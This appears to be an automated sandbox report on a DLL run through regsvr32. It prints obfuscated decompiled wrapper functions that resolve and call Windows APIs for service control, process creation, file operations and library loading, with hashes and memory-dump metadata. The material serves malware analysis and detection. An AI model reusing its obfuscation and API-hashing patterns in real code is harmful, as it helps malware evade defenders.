Download Yara Rule

C-Code - Quality: 92%

			E1000BA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E1001BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}

0x1000baa2
0x1000baa9
0x1000baad
0x1000bab4
0x1000babb
0x1000babf
0x1000bac6
0x1000bacd
0x1000bad4
0x1000badb
0x1000bae6
0x1000baee
0x1000baf6
0x1000bafa
0x1000bb12
0x1000bb1d

APIs

ExitProcess.KERNEL32(00116E69), ref: 1000BB1D

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction ID: 8b053e7fd0c7c19cbffb8e592a3d1a6bbcb506d1d2403606fd79baaff6e70ad2
Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction Fuzzy Hash: 91010475D1120CEB8B04DFA4CA4A9DEBBB4FB04348F10859DE821B7211D7B55B44CF81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 2628, Parent PID: 2236COMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1055
Total number of Limit Nodes:	16

Executed Functions

Function 1000F1D5 Relevance: 1.6, APIs: 1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E1000F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E10009E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E1001BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 1000F2B0

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction ID: 43db0fbf410f694bd0ef4dec65830130c7b281efdb88c6d3b62f5dfa9fb1508e
Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction Fuzzy Hash: B12155B5D0121DAFDB08DFA5C88A8EEFBB4FB48708F10809DE515AA240C7B45B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 100032B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E100032B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E10009E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E1001BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 10003384

Strings

w\ y, xrefs: 1000331D

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: w\ y
API String ID: 1889721586-240614871
Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction ID: 2673d0b832e4d885b295aa3d0736083a12d9b67bb68571235ce8c26550880700
Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction Fuzzy Hash: 5C2123B5D01228FBDB04DFA9D84A9EEBFB5FF40344F208189E424AA250D3B56B40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E1000C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E1001BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}

APIs

OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 1000C5BC

Strings

", xrefs: 1000C577

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: "
API String ID: 3098006287-1598837362
Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction ID: 888a1af328b60e3115df81a15206c86fde9c8a5b62bfb3d5199cc9c56e09e132
Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction Fuzzy Hash: BF2120B6C0020DEBCF15DFA4D8499EEBBB4FF04318F108598E9256A260E3B19B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001A98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E1001A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E10009E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E1001BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}

APIs

CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 1001AA4C

Strings

ijp, xrefs: 1001A9EB

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: ijp
API String ID: 1725840886-2001787820
Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction ID: 08d8414517ae60290be451ade77ec7b27b58724690d5fe81316851794a35ed95
Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction Fuzzy Hash: D62117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C199E404AB250D7B49B449F84

Uniqueness

Uniqueness Score: -1.00%

Function 1000338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E1000338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E10009E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E1001BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}

APIs

SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 1000344F

Strings

|[0, xrefs: 100033FC

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: |[0
API String ID: 3080627654-3711761429
Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction ID: 33a28676a97f025cdeb7d50283b02d7e423aae746988ab354802b81ac360808e
Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction Fuzzy Hash: 0D2124B4D00209EFDF04DFA5C94AAAEBBB4FB00304F108189E424AA290D7B96B548F90

Uniqueness

Uniqueness Score: -1.00%

Function 1001E373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1001E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E10009E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E1001BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,10013F2A,00000000), ref: 1001E42F

Strings

M8, xrefs: 1001E3ED

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: M8
API String ID: 2962429428-669864304
Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction ID: eb367e5f18db3a68d22521a23e7b1cd58748ba1d5980e3efdeacfb35b3ff9a68
Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction Fuzzy Hash: 991129B5D00209EFDF58CFE4C94989EBBB4EB40324F108299E824B6291D7B55B059F91

Uniqueness

Uniqueness Score: -1.00%

Function 100146E0 Relevance: 1.6, APIs: 1, Instructions: 76
processCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E100146E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E10009E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E1001BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 100147CA

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction ID: bcf8ef1c5a943e26b57c193b06fd13cf537ea9bceb521d738b9e4d3f43ab073a
Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction Fuzzy Hash: EF31E272900248BBDF559F95CD09CDEBF76FB89314F008188FA2466160D7B69A60EB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001BF1C Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E1001BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E1001BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}

APIs

CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 1001BFE8

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction ID: a5ad079ddfa0ac31df0ef3774d91f9d1bc30e2e7502c2c862d30a0e22a434d2f
Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction Fuzzy Hash: DD21F47680020DBBCF15DF96C9098DFBFB5FB84748F008198F925A2220D3B28A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 10011B22 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10011B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E1001BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 10011BE5

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction ID: d0d425b45aa9a9f6d610c3e920a00689aa0f8126b2cb960a283d8320a45d68de
Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction Fuzzy Hash: A82132B5D00208FBDF05CFA5C94A8EEBBB5FB80314F108089E814A6261D3B4AB41DF61

Uniqueness

Uniqueness Score: -1.00%

Function 100166C2 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E100166C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E10009E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E1001BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}

APIs

SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 10016777

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction ID: 52e6f9726e4b7dbd304e61318c5a5b76c55d74289c49a6a1ffc23bebd90897b8
Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction Fuzzy Hash: 861142B2800208FBCF15CFA5CC0A8DEBFB8EF85304F108198E92966210D3B19A65DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000FCB5 Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E10009E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E1001BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 1000FD58

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
